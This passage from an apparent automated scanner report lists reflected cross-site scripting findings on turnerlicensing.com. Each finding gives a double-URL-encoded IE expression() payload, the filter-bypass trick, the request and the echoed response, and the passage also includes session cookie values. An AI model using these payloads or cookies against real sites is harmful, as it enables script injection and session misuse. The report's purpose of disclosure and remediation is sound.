Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:20 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082685:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262138&dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1&fromsla=T&dec49'style='x:expression(alert(1))'b65b930df92=1&dec49%27style%3d%27x%3aexpression%28alert%281%29%29%27b65b930df92=1'>
...[SNIP]...

2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /MLB

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:30 GMT
NS_RTIMER_COMPOSITE: 670284442:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 57803


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>MLB</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=68&8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1&8600f%27style%3d%27x%3aexpression%28alert%281%29%29%2740335c5bc15=1&8600f'style='x:expression(alert(1))'40335c5bc15=1&fromsla=T'>
...[SNIP]...

2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA?e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272924.1290272963.7; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272963; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:57 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:58 GMT
NS_RTIMER_COMPOSITE: -367531585:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JnnzMyKdyxbFsWhzHTc3QhzQf7lJ1pKW7GGN5xtJyC1x8h3RQKWHgXvy2TxRqxsqJZLQ361q6Llxdq9S8Tb2NkJHbZnYvfnLQ5Yd2QMRndHqbXGhYNGqcLPlv55d4yPF!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 58118


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NBA</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=69&e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1&e1530%27style%3d%27x%3aexpression%28alert%281%29%29%27b802c6ba968=1&e1530'style='x:expression(alert(1))'b802c6ba968=1&fromsla=T'>
...[SNIP]...

2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:07 GMT
NS_RTIMER_COMPOSITE: 1666333946:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94901


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144026&d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1&d38e8%27style%3d%27x%3aexpression%28alert%281%29%29%278d6ba417d1b=1&d38e8'style='x:expression(alert(1))'8d6ba417d1b=1&fromsla=T'>
...[SNIP]...

2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NFL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -1590895309:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58596


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NFL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=67&4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1&4bff4'style='x:expression(alert(1))'467f646483f=1&4bff4%27style%3d%27x%3aexpression%28alert%281%29%29%27467f646483f=1&fromsla=T'>
...[SNIP]...

2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NHL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -109262757:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=941
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58337


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NHL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=70&9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1&9c378'style='x:expression(alert(1))'55966d0d35d=1&9c378%27style%3d%27x%3aexpression%28alert%281%29%29%2755966d0d35d=1&fromsla=T'>
...[SNIP]...

2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Players

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1114186826:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=555
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 63359


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Players</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=72&830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1&830e5'style='x:expression(alert(1))'65ac4008624=1&830e5%27style%3d%27x%3aexpression%28alert%281%29%29%2765ac4008624=1&fromsla=T'>
...[SNIP]...

2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Stadiums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: -1255247182:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89698


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Stadiums</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=73&4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1&4c355%27style%3d%27x%3aexpression%28alert%281%29%29%272ca472c83b2=1&4c355'style='x:expression(alert(1))'2ca472c83b2=1&fromsla=T'>
...[SNIP]...

2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Contact-Us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590873402:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=947
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33583


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Contact Us</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...
...[SNIP]...
.turnerlicensing.com/s.nl?it=I&id=86&6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1&6dd9c%27style%3d%27x%3aexpression%28alert%281%29%29%277f7d614df6b=1&fromsla=T&6dd9c'style='x:expression(alert(1))'7f7d614df6b=1'>
...[SNIP]...

2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Email-Sign-Up

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811326705:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=863
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Email Sign Up</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=87&41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1&41989%27style%3d%27x%3aexpression%28alert%281%29%29%27cc1e08c1a24=1&41989'style='x:expression(alert(1))'cc1e08c1a24=1&fromsla=T'>
...[SNIP]...

2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /book_covers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.

